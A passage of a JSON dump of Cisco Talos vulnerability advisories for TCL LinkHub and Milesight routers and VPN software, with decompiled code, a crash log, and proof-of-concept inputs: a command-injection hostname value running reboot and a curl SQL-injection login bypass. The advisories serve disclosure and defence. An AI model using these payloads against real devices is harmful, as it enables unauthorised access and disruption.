$v0_1 = system(&var_408)\n 00020ab8 log_debug_print(\"doSystemCmd\", &data_1b93, 0, 0x80, 0x55510) {\"function exit!\"}\n 00020ad8 return $v0_1 \n \n\nWith a quick look at `doSystemCmd` we can see that no special escaping is happening here and thus this is a simple command injection using `serialNum` directly.\n\n##### TIMELINE\n\n2022-04-27 - Vendor Disclosure \n2022-08-01 - Public Release\n\n##### Credit\n\nDiscovered by Carl Hurd of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2022-1459\n\nPrevious Report\n\nTALOS-2022-1457\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-01T00:00:00", "type": "talos", "title": "TCL LinkHub Mesh Wifi confsrv ucloud_add_node OS command injection vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22140"], "modified": "2022-08-01T00:00:00", "id": "TALOS-2022-1458", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1458", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T18:56:19", "description": "# Talos Vulnerability Report\n\n### TALOS-2022-1482\n\n## TCL LinkHub Mesh Wi-Fi confsrv addTimeGroup stack-based buffer overflow vulnerability\n\n##### August 1, 2022\n\n##### CVE Number\n\nCVE-2022-25996\n\n##### SUMMARY\n\nA stack-based buffer overflow vulnerability exists in the confsrv addTimeGroup functionality of TCL LinkHub Mesh Wi-Fi MS1G_00_01.00_14. A specially-crafted network packet can lead to a buffer overflow. An attacker can send a malicious packet to trigger this vulnerability.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nTCL LinkHub Mesh Wifi MS1G_00_01.00_14\n\n##### PRODUCT URLS\n\nLinkHub Mesh Wifi - <https://www.tcl.com/us/en/products/connected-home/linkhub/linkhub-mesh-wifi-system-3-pack>\n\n##### CVSSv3 SCORE\n\n8.8 - CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n##### CWE\n\nCWE-121 - Stack-based Buffer Overflow\n\n##### DETAILS\n\nThe LinkHub Mesh Wi-Fi system is a node-based mesh system designed for Wi-Fi deployments across large homes. These nodes include most features standard in current Wi-Fi solutions and allow for easy expansion of the system by adding nodes. The mesh is managed solely by a phone application, and the routers have no web-based management console.\n\nThe LinkHub Mesh system uses protobuffers to communicate both internally on the device as well as externally with the controlling phone application. These protobuffers can be sent to port 9003 while on the Wi-Fi provided by the LinkHub Mesh in order to issue commands, much like the phone application would. Once the protobuffer is received, it is routed internally starting from the `ucloud` binary and is dispatched to the appropriate handler.\n\nIn this case, the handler is `confsrv` which handles many message types. In this case we are interested in `TimeGroup` and `TimeRule`\n \n \n message TimeRule {\n required int32 id = 1;\n required string desc = 2;\n required bool enable = 3;\n required string week = 4; [1]\n required int32 begin_in_min = 5;\n required int32 end_in_min = 6;\n }\n message TimeGroup {\n repeated TimeRule tm_rule = 1; \n optional uint64 timestamp = 2;\n }\n \n\nUsing [1] we have control over `week` in the packet. The parsing of the data in the protobuf is done in `set_time_group_rule`.\n \n \n 0041acb8 int32_t set_time_group_rule(struct TimeGroup* pkt)\n \n 0041acf8 void var_e4\n 0041acf8 memset(&var_e4, 0, 0x80)\n 0041ad04 int32_t var_e8 = 0\n 0041ad08 int32_t var_ec = 0\n 0041ad0c int32_t var_f0 = 0\n 0041ad10 int32_t var_64 = 0\n 0041ad14 int32_t var_60 = 0\n 0041ad18 int32_t var_5c = 0\n 0041ad1c int32_t var_58 = 0\n 0041ad20 int32_t var_54 = 0\n 0041ad24 int32_t var_50 = 0\n 0041ad40 GetValue(name: \"log.time.enable\", output_buffer: &var_5c)\n 0041ad70 if (atoi(&var_5c) == 1) {\n 0041ada0 printf(\"Debug->%s: %s(%d)--\\n\", \"../conf_time_group_api.c\", \"set_time_group_rule\", 0xba)\n 0041ad94 }\n 0041af58 uint32_t var_100\n 0041af58 for (int32_t loop_idx = 0; loop_idx u< pkt->tm_rule_count; loop_idx = loop_idx + 1) {\n 0041adcc struct TimeRule* $v0_5 = *(pkt->tm_rules + (loop_idx << 2))\n 0041add4 int32_t var_4c = 0\n 0041add8 int32_t var_48_1 = 0\n 0041addc int32_t var_44_1 = 0\n 0041ade0 int32_t var_40_1 = 0\n 0041adfc GetValue(name: \"log.time.enable\", output_buffer: &var_4c)\n 0041ae2c if (atoi(&var_4c) == 1) {\n 0041ae44 var_100 = pkt->tm_rule_count\n 0041ae68 printf(\"Debug->%s: %s(%d)--\\nn_tm_rule =\u2026\", \"../conf_time_group_api.c\", \"set_time_group_rule\", 0xbf, var_100)\n 0041ae68 }\n 0041ae78 if ($v0_5 != 0) {\n 0041ae90 addTimeGroup($v0_5, var_ec) [2]\n ...\n \n\nAt [2] the parsing is passed off to `addTimeGroup` if the `TimeGroup` reports having more than 0 `tm_rule`. The `TimeRule` protobuffer is passed into `addTimeGroup` for further parsing.\n \n \n 00419eb4 int32_t addTimeGroup(struct TimeRule* arg1, int32_t arg2)\n \n 00419ef8 uint8_t var_108[0x80]\n 00419ef8 memset(&var_108, 0, 0x80)\n 00419f04 uint8_t var_88[0x20]\n 00419f04 var_88[0].d = 0\n 00419f08 var_88[4].d = 0\n 00419f0c var_88[8].d = 0\n 00419f10 var_88[0xc].d = 0\n 00419f14 var_88[0x10].d = 0\n 00419f18 var_88[0x14].d = 0\n 00419f1c var_88[0x18].d = 0\n 00419f20 var_88[0x1c].d = 0\n 00419f24 int32_t var_68 = 0\n 00419f28 int32_t var_64 = 0\n 00419f2c int32_t var_60 = 0\n 00419f30 int32_t var_5c = 0\n 00419f34 int32_t var_58 = 0\n 00419f38 int32_t var_54 = 0\n 00419f44 char var_50 = 0\n 00419f48 char var_4f = 0\n 00419f4c char var_4e = 0\n 00419f50 char var_4d = 0\n 00419f54 char var_4c = 0\n 00419f58 char var_4b = 0\n 00419f5c char var_4a = 0\n 00419f60 char var_49 = 0\n 00419f64 int32_t var_10c = 0\n 00419f68 int32_t var_110 = 0\n 00419f6c int32_t var_48 = 0\n 00419f70 int32_t var_44 = 0\n 00419f74 int32_t var_40 = 0\n 00419f78 int32_t var_3c = 0\n 00419f7c int32_t var_38 = 0\n 00419f80 int32_t var_34 = 0\n 00419f84 int32_t var_30 = 0\n 00419f88 int32_t var_2c = 0\n 00419f8c int32_t var_28 = 0\n 00419f90 int32_t var_24 = 0\n 00419f94 int32_t var_20 = 0\n 00419f98 int32_t var_1c = 0\n 00419fb4 GetValue(name: \"log.time.enable\", output_buffer: &var_28)\n 00419fe4 if (atoi(&var_28) == 1) {\n 0041a014 printf(\"Debug->%s: %s(%d)--\\n\", \"../conf_time_group_api.c\", \"addTimeGroup\", 0x38)\n 0041a008 }\n 0041a028 if (arg1->week != 0) {\n 0041a04c strcpy(&var_68, arg1->week) [3]\n 0041a034 } \n ...\n \n\nAt [3] we can clearly see that if `week` is populated within the `TimeRule` protobuf, a `strcpy` is performed without any validation of buffer or input length, which can lead to a stack-based buffer overflow. Below we can verify the issue in ASM:\n \n \n 0041a024 1800428c lw $v0, 0x18($v0) {TimeRule::week} [4]\n 0041a028 0b004010 beqz $v0, 0x41a058\n 0041a02c 00000000 nop \n \n 0041a030 4001c28f lw $v0, 0x140($fp) {arg_0}\n 0041a034 1800428c lw $v0, 0x18($v0) {TimeRule::week}\n 0041a038 d800c327 addiu $v1, $fp, 0xd8 {var_68}\n 0041a03c 21206000 move $a0, $v1 {var_68} [5]\n 0041a040 21284000 move $a1, $v0\n 0041a044 7c86828f lw $v0, -0x7984($gp) {strcpy}\n 0041a048 21c84000 move $t9, $v0\n 0041a04c 09f82003 jalr $t9 [6]\n 0041a050 00000000 nop \n \n\nAt [4] we see that the `week` value is loaded from the protobuf and checked to see if it is non-zero. At [5] the stack-buffer is being loaded as the `dst` argument for `strcpy`, and at [6] we see that `strcpy` is being called with no additional validation or verification of the buffer or input length. This leads to a simple stack-based buffer overflow.\n\n### Crash Information\n \n \n Program received signal SIGSEGV, Segmentation fault.\n 0x41414141 in ?? ()\n [ Legend: Modified register | Code | Heap | Stack | String ]\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 registers \u2500\u2500\u2500\u2500\n $zero: 0x0\n $at : 0x806f0000\n $v0 : 0x1\n $v1 : 0x0\n $a0 : 0x0\n $a1 : 0x7fffffff\n $a2 : 0xa\n $a3 : 0x1\n $t0 : 0x7fadd019 \u2192 0x00000000\n $t1 : 0x7fadd018 \u2192 0x00000000\n $t2 : 0x5\n $t3 : 0x19999999\n $t4 : 0x777fa8e4 \u2192 0x0000000b (\"\n \"?)\n $t5 : 0x0\n $t6 : 0x22\n $t7 : 0x0\n $s0 : 0x7fadd348 \u2192 0x82011607\n $s1 : 0x7fadd348 \u2192 0x82011607\n $s2 : 0x77612a60 \u2192 \"uc_api_lib.c\"\n $s3 : 0x0\n $s4 : 0x77613be4 \u2192 \"_session_read_and_dispatch\"\n $s5 : 0x775f9090 \u2192 lui gp, 0x3\n $s6 : 0x7e\n $s7 : 0x10\n $t8 : 0x1\n $t9 : 0x0\n $k0 : 0x0\n $k1 : 0x0\n $s8 : 0x41414141 (\"AAAA\"?)\n $pc : 0x41414141 (\"AAAA\"?)\n $sp : 0x7fadd030 \u2192 0x004bb900 \u2192 0x004bba68 \u2192 \"CMD_MESH_WLAN_SET\"\n $hi : 0x5\n $lo : 0x19999999\n $fir : 0x0\n $ra : 0x41414141 (\"AAAA\"?)\n $gp : 0x004ae4b0 \u2192 0x00000000\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 stack \u2500\u2500\u2500\u2500\n 0x7fadd030\u2502+0x0000: 0x004bb900 \u2192 0x004bba68 \u2192 \"CMD_MESH_WLAN_SET\" \u2190 $sp\n 0x7fadd034\u2502+0x0004: 0x00000000\n 0x7fadd038\u2502+0x0008: 0x00000000\n 0x7fadd03c\u2502+0x000c: 0x00000000\n 0x7fadd040\u2502+0x0010: 0x00000000\n 0x7fadd044\u2502+0x0014: 0x00000000\n 0x7fadd048\u2502+0x0018: 0x004ae4b0 \u2192 0x00000000\n 0x7fadd04c\u2502+0x001c: 0x00000000\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 code:mips:MIPS32 \u2500\u2500\u2500\u2500\n [!] Cannot disassemble from $PC\n [!] Cannot access memory at address 0x41414140\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 threads \u2500\u2500\u2500\u2500\n [#0] Id 1, stopped 0x41414141 in ?? (), reason: SIGSEGV\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 trace \u2500\u2500\u2500\u2500\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 \n \n\n##### TIMELINE\n\n2022-03-16 - Vendor Disclosure \n2022-08-01 - Public Release\n\n##### Credit\n\nDiscovered by Carl Hurd of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2022-1484\n\nPrevious Report\n\nTALOS-2022-1463\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-01T00:00:00", "type": "talos", "title": "TCL LinkHub Mesh Wi-Fi confsrv addTimeGroup stack-based buffer overflow vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-25996"], "modified": "2022-08-01T00:00:00", "id": "TALOS-2022-1482", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1482", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-08T19:04:39", "description": "# Talos Vulnerability Report\n\n### TALOS-2023-1699\n\n## Milesight UR32L libzebra.so change_hostname OS command injection vulnerability\n\n##### July 6, 2023\n\n##### CVE Number\n\nCVE-2023-22659\n\n##### SUMMARY\n\nAn os command injection vulnerability exists in the libzebra.so change_hostname functionality of Milesight UR32L v32.3.0.5. A specially-crafted network packets can lead to command execution. An attacker can send a sequence of requests to trigger this vulnerability.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nMilesight UR32L v32.3.0.5\n\n##### PRODUCT URLS\n\nUR32L - <https://www.milesight-iot.com/cellular/router/ur32l/>\n\n##### CVSSv3 SCORE\n\n7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n\n##### CWE\n\nCWE-77 - Improper Neutralization of Special Elements used in a Command (\u2018Command Injection\u2019)\n\n##### DETAILS\n\nThe Milesight UR32L is an industrial cellular router. The router features include support for multiple VPNs, a router console shell, firewall and many others.\n\nThe router offers telnet and sshd services. Both, when provided with the correct credentials, will allow access to the Router console. This is an interactive shell to modify the router settings.\n\nHere is the prompt after the login:\n \n \n *** TERMINFO:/etc/terminfo TERM:linux *****\n -- model:UR32L,sn:<redacted>,hwver:0300 partnumber:<redacted>--\n \n -------------------------------------------------------------------------\n Product Model : UR32L\n Firmware Version : 32.3.0.5\n -------------------------------------------------------------------------\n \n ROUTER> \n \n\nThe service has several functionalities, the number of functionalities depends also on the user privileges. Indeed, the admin user can access the `enable` command, that will allow to access an high privileges command menu:\n \n \n ROUTER> enable \n ROUTER# \n cellular-gps-dev\n clear Reset functions\n configure Configuration from vty interface\n copy Copy from one file to another\n core Set debug level\n debug Debugging functions (see also 'undebug')\n disable Turn off privileged mode command\n enable Turn on privileged mode command\n end End current mode and change to enable mode\n exit Exit current mode and down to previous mode\n list Print command list\n modbus-master\n no Negate a command or set its defaults\n ping Send echo messages\n quit Exit current mode and down to previous mode\n reload Halt and perform a cold restart\n show Show running system information\n ssh Open an ssh connection\n telnet Open a telnet connection\n terminal Set terminal line parameters\n test Test\n traceroute Trace route to destination\n undebug Disable debugging functions (see also 'debug')\n write Write running configuration to memory, network, or terminal\n \n\nThe command that we are going to analyze is called `hostname`. This function is called as `hostname <new_hostname>` and is used to change hostname for the device. This command is in the sub-menu reachable through the `configure terminal` command:\n \n \n ROUTER# configure terminal \n ROUTER(config)# \n [...]\n hostname Set system's network name\n [...]\n \n\nThe `libzebra.so.0.0.0`\u2019s `hostname_command` function is responsible for managing the `hostname` command:\n \n \n undefined4 hostname_command(undefined4 param_1,int param_2,undefined4 param_3,byte **argv)\n \n {\n undefined4 uVar1;\n char *pcVar2;\n \n if (0x19 < (**argv | 0x20) - 0x61) {\n [...]\n }\n uVar1 = change_hostname_wrap(argv);\n return uVar1;\n }\n \n\nThis function will check if the provided hostname starts with a letter of the alphabet, then the `change_hostname_wrap` function will be called with the new hostname. The function `change_hostname_wrap` will check if the current hostname differs from the new one, in such case the function `change_hostname` will be eventually called:\n \n \n void change_hostname(char *new_hostname)\n \n {\n int iVar1;\n char change_hostname_command [128];\n \n iVar1 = __stack_chk_guard;\n change_hostname_command._0_4_ = 0;\n memset(change_hostname_command + 4,0,0xfc);\n snprintf(change_hostname_command,0x100,\"uci set system.@system[0].hostname='%s';uci commit\",\n new_hostname); [1]\n system(change_hostname_command); [2]\n [...]\n }\n \n\nThis function will compose, at `[1]`, the `uci set system.@system[0].hostname='<new_username>';uci commit` string. The composed string will then be executed, at `[2]`, using the `system` function. The `change_hostname` function is vulnerable to a command injection vulnerability, indeed, the `new_hostname` parameter it will reach the `system` function and the `hostname` command does only checks if the first character is alphabetic, this is not enough to prevent a command injection.\n\n### Exploit Proof of Concept\n\nFollowing a POC triggering a reboot of the system through the command injection exposes above:\n \n \n *** TERMINFO:/etc/terminfo TERM:linux *****\n -- model:UR32L,sn:<redacted>,hwver:0300 partnumber:<redacted>--\n \n -------------------------------------------------------------------------\n Product Model : UR32L\n Firmware Version : 32.3.0.5\n -------------------------------------------------------------------------\n \n ROUTER> enable\n ROUTER# configure terminal\n ROUTER(config)# hostname a'$(reboot)'\n old hostname null\n a(config)# Connection closed by foreign host.\n \n\nThe `Connection closed by foreign host.` is the consequence of the device that is rebooting.\n\n##### VENDOR RESPONSE\n\nSince the maintainer of this software did not release a patch during the 90 day window specified in our policy, we have now decided to release the information regarding this vulnerability, to make users of the software aware of this problem. See Cisco\u2019s Coordinated Vulnerability Disclosure Policy for more information: https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html\n\n##### TIMELINE\n\n2023-02-14 - Initial Vendor Contact \n2023-02-21 - Vendor Disclosure \n2023-07-06 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2023-1698\n\nPrevious Report\n\nTALOS-2023-1711\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-06T00:00:00", "type": "talos", "title": "Milesight UR32L libzebra.so change_hostname OS command injection vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "MULTIPLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-22659"], "modified": "2023-07-06T00:00:00", "id": "TALOS-2023-1699", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1699", "cvss": {"score": 5.8, "vector": "AV:N/AC:L/Au:M/C:P/I:P/A:P"}}, {"lastseen": "2023-11-08T19:04:37", "description": "# Talos Vulnerability Report\n\n### TALOS-2023-1701\n\n## Milesight MilesightVPN requestHandlers.js LoginAuth SQL injection vulnerability\n\n##### July 6, 2023\n\n##### CVE Number\n\nCVE-2023-22319\n\n##### SUMMARY\n\nA sql injection vulnerability exists in the requestHandlers.js LoginAuth functionality of Milesight VPN v2.0.2. A specially-crafted network request can lead to authentication bypass. An attacker can send a malicious packet to trigger this vulnerability.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nMilesight VPN v2.0.2\n\n##### PRODUCT URLS\n\nMilesightVPN - <https://www.milesight-iot.com/milesightvpn/>\n\n##### CVSSv3 SCORE\n\n7.3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\n\n##### CWE\n\nCWE-89 - Improper Neutralization of Special Elements used in an SQL Command (\u2018SQL Injection\u2019)\n\n##### DETAILS\n\nThe MilesightVPN is software that make the process easier of setting up the VPN tunnel for Milesight products, as well as allows monitoring the connection status with a web server interface.\n\nThe MilesightVPN allow to manages the various VPN related configuration and the connected devices through its web interface. The web interface is protected by a login, the responsibility of checking the correctness of the provided credentials is of the `requestHandlers.js`\u2019s `LoginAuth` function:\n \n \n function LoginAuth(res,postdata,connection){\n console.info('#######log.node:loginauth start');\n var sha512=crypto.createHash('sha512');\n sha512.update(postdata.pwd);\n var pwd=sha512.digest('hex');\n $sql=\"select * from user where user='\"+postdata.user+\"' and passwd='\"+pwd+\"'\"; [1]\n connection.query($sql).then(function(data){ [2]\n var result={};\n if(data['error'])\n {\n [...]\n }\n else\n {\n if(data['result'].length>0)\n {\n var dt=data['result'];\n result['status']=1;\n var token=generateToken(dt[0]['user']);\n var exp=new Date(new Date().getTime()+expiretime*1000).toUTCString();\n res.setHeader('Set-Cookie',['token='+token]);\n console.info('#######log.node:loginauth success');\n res.write(JSON.stringify(result));\n res.end();\n }\n else\n {\n [...]\n }\n }\n });\n }\n \n\nThe function compose, at `[1]`, the SQL query for checking if the username and password provided correspond to the one of an existing user. Then, at `[2]`, the query is executed, if the resulting table is not empty a JWT, corresponding to the matched user, is crafted and placed in the response header as value of `Set-Cookie`.\n\nThis function is vulnerable to an SQL injection vulnerability, indeed, the composition of the query string is performed through string concatenation instead of a prepare statement. This SQL injection can lead to an authentication bypass.\n\n### Exploit Proof of Concept\n\nFollowing a POC that demonstrates the SQL injection in the login procedure discussed above:\n \n \n curl -i -k -d \"user=admin' -- &pwd=POC\" -X POST https://<SERVER_ADDRESS>/LoginAuth \n \n HTTP/1.1 200 OK\n Set-Cookie: token=<redacted>\n Date: [...]\n Connection: keep-alive\n Transfer-Encoding: chunked\n \n {\"status\":1}\n \n\nThe `{\"status\":1}` show that the login procedure found a match for the data provided.\n\n##### VENDOR RESPONSE\n\nSince the maintainer of this software did not release a patch during the 90 day window specified in our policy, we have now decided to release the information regarding this vulnerability, to make users of the software aware of this problem. See Cisco\u2019s Coordinated Vulnerability Disclosure Policy for more information: https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html\n\n##### TIMELINE\n\n2023-02-14 - Initial Vendor Contact \n2023-02-21 - Vendor Disclosure \n2023-07-06 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2023-1700\n\nPrevious Report\n\nTALOS-2023-1702\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-06T00:00:00", "type": "talos", "title": "Milesight MilesightVPN requestHandlers.js LoginAuth SQL injection vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-22319"], "modified": "2023-07-06T00:00:00", "id": "TALOS-2023-1701", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1701", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-08T19:04:38", "description": "# Talos Vulnerability Report\n\n### TALOS-2023-1694\n\n## Milesight UR32L ys_thirdparty user_delete OS command injection 